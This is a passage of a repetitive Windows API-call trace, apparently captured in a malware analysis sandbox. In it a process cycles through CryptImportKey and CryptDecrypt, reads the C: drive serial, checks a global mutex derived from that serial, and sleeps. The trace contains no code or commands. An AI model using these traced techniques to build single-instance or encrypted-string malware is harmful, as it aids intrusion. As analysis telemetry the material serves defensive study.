(hKey=0xa32968, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0143.884] CryptDecrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0143.884] CryptDestroyKey (hKey=0xa32968) returned 1 [0143.884] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0143.884] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0143.885] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0143.885] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32968) returned 1 [0143.885] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0143.885] CryptDecrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0143.885] CryptDestroyKey (hKey=0xa32968) returned 1 [0143.885] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0143.885] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0143.885] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0143.885] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0143.885] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0143.885] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0143.885] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0143.885] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32968) returned 1 [0143.885] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0143.885] CryptDecrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0143.885] CryptDestroyKey (hKey=0xa32968) returned 1 [0143.885] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0143.885] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x130 [0143.885] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x0) returned 0x102 [0143.885] CloseHandle (hObject=0x130) returned 1 [0143.885] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0143.885] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0143.885] Sleep (dwMilliseconds=0x3e8) [0145.246] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0145.246] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32d28) returned 1 [0145.246] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0145.246] CryptDecrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0145.246] CryptDestroyKey (hKey=0xa32d28) returned 1 [0145.246] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0145.246] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0145.246] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0145.246] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32d28) returned 1 [0145.246] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0145.246] CryptDecrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0145.246] CryptDestroyKey (hKey=0xa32d28) returned 1 [0145.246] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0145.246] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0145.246] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0145.247] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0145.247] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0145.247] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0145.247] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0145.247] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32d28) returned 1 [0145.247] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0145.247] CryptDecrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0145.247] CryptDestroyKey (hKey=0xa32d28) returned 1 [0145.247] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0145.247] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x188 [0145.247] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x0) returned 0x102 [0145.247] CloseHandle (hObject=0x188) returned 1 [0145.248] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0145.248] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0145.248] Sleep (dwMilliseconds=0x3e8) [0147.382] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0147.382] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32d28) returned 1 [0147.382] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0147.382] CryptDecrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0147.382] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.382] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0147.382] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0147.382] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0147.382] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32d28) returned 1 [0147.382] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0147.382] CryptDecrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0147.382] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.382] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0147.382] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0147.382] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0147.382] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0147.383] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0147.383] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0147.383] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0147.383] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32d28) returned 1 [0147.383] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0147.383] CryptDecrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0147.383] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.383] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0147.383] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x140 [0147.383] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x0) returned 0x102 [0147.383] CloseHandle (hObject=0x140) returned 1 [0147.383] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0147.383] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0147.383] Sleep (dwMilliseconds=0x3e8) [0148.476] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0148.476] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa327e8) returned 1 [0148.476] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0148.476] CryptDecrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0148.476] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.477] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0148.477] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0148.477] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0148.477] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa327e8) returned 1 [0148.477] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0148.477] CryptDecrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0148.477] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.477] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0148.477] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0148.477] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0148.477] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0148.477] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0148.477] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0148.477] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0148.477] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa327e8) returned 1 [0148.477] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0148.477] CryptDecrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0148.477] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.477] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0148.477] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x188 [0148.477] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x0) returned 0x102 [0148.477] CloseHandle (hObject=0x188) returned 1 [0148.477] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0148.477] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0148.477] Sleep (dwMilliseconds=0x3e8) [0149.943] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0149.943] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32da8) returned 1 [0149.943] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0149.943] CryptDecrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0149.943] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.943] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0149.943] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0149.943] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0149.943] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32da8) returned 1 [0149.943] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0149.943] CryptDecrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0149.943] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.943] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0149.943] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0149.943] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0149.943] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0149.943] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0149.944] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0149.944] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0149.944] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32da8) returned 1 [0149.944] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0149.944] CryptDecrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0149.944] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.944] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0149.944] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x148 [0149.944] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x0) returned 0x102 [0149.944] CloseHandle (hObject=0x148) returned 1 [0149.944] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0149.944] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0149.944] Sleep (dwMilliseconds=0x3e8) [0151.066] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0151.066] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32de8) returned 1 [0151.066] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0151.066] CryptDecrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0151.066] CryptDestroyKey (hKey=0xa32de8) returned 1 [0151.066] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0151.066] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0151.066] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0151.066] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32de8) returned 1 [0151.066] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0151.066] CryptDecrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0151.066] CryptDestroyKey (hKey=0xa32de8) returned 1 [0151.066] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0151.066] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0151.066] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0151.066] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0151.066] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0151.066] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0151.066] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0151.066] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32de8) returned 1 [0151.066] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0151.066] CryptDecrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0151.067] CryptDestroyKey (hKey=0xa32de8) returned 1 [0151.067] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0151.067] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x194 [0151.067] WaitForSingleObject (hHandle=0x194, dwMilliseconds=0x0) returned 0x102 [0151.067] CloseHandle (hObject=0x194) returned 1 [0151.067] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0151.067] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0151.067] Sleep (dwMilliseconds=0x3e8) [0152.740] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0152.740] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32d28) returned 1 [0152.740] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0152.740] CryptDecrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0152.740] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.740] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0152.740] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0152.740] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0152.740] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32d28) returned 1 [0152.740] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0152.740] CryptDecrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0152.740] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.740] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0152.740] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0152.740] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0152.740] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0152.740] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0152.741] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0152.741] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0152.741] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32d28) returned 1 [0152.741] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0152.741] CryptDecrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0152.741] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.741] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0152.741] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x188 [0152.741] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x0) returned 0x102 [0152.741] CloseHandle (hObject=0x188) returned 1 [0152.741] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0152.741] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0152.741] Sleep (dwMilliseconds=0x3e8) [0154.504] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0154.504] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: 